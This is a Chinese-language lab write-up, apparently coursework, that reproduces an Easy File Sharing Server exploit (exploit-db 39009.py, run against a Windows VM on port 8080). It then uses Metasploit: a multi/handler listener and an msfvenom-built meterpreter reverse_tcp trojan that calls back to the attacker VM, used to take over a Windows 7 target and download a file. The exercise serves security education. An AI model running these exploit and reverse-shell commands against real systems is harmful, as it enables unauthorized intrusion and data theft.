一、Easy File Sharing Server漏洞复现
(一)任务要求
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档
(二)过程
1.要安装一个windows虚拟机来当做靶机。
2.把下载好的easy file sharing 拖动到靶机中进行安装。
(1) 点击try it。
(2)将端口号改为8080。
3.打开kali虚拟机,使用Nmap功能,发现8080端口运行着easy file sharing server服务。
命令:nmap -sV -A -o easy-file.txt ip 扫描(sV 服务版本识别、-A 强力检测选项,得到更多信息、-o 将扫描结果写入文件)
4.我们使用命令:searchsploit easy file sharing 得到这个画面。
图中左栏是渗透模块的名称,右侧是对应的位置
我们的目的是打开靶机的计算器,位置是usr/share/exploitdb/exploits/windows/remote/39009.py
5.在kali打开另一个终端来执行命令,命令格式如下:python2 位置 靶机ip 端口号 。
python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.223.137 8080
回到靶机发现计算器已经被打开,复现完成。
二、Metasploit应用
(一)任务要求
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。见课本P127-133
1、复现环境
攻击机
系统:kali-Linux
IP地址:192.168.223.134
靶机
系统:Windows7
IP地址: 192.168.223.137
2、生成主控端与被控端
(1)生成主控端
使用命令msfconsole,打开msfconsole。
依次使用命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.223.134
set lport 5000
exploit
(2)生成受控端
使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.223.134 lport=5000 -f exe -o /root/payload.exe
在这段命令中lhost是你本机(kali)的ip地址,lport和lhost要和上面生成主控端的代码一致
这个命令的作用是在/root/目录下生成一个payload.exe文件,这个payload文件实际上就是一个可以对Windows进行操作的木马程序。
生成结果如下
在文件系统中的root 可以看到成功生成payload.exe。
3、获得靶机(Windows)控制权
(1)、将文件复制到Windows中
(1)将文件在靶机中运行后,kali的终端会出现以下界面
并用ls控制查看木马所在目录的文件
先提前在靶机上新建个2.txt文件,然后在kali中下载。
即在home/ly中看到下载文件。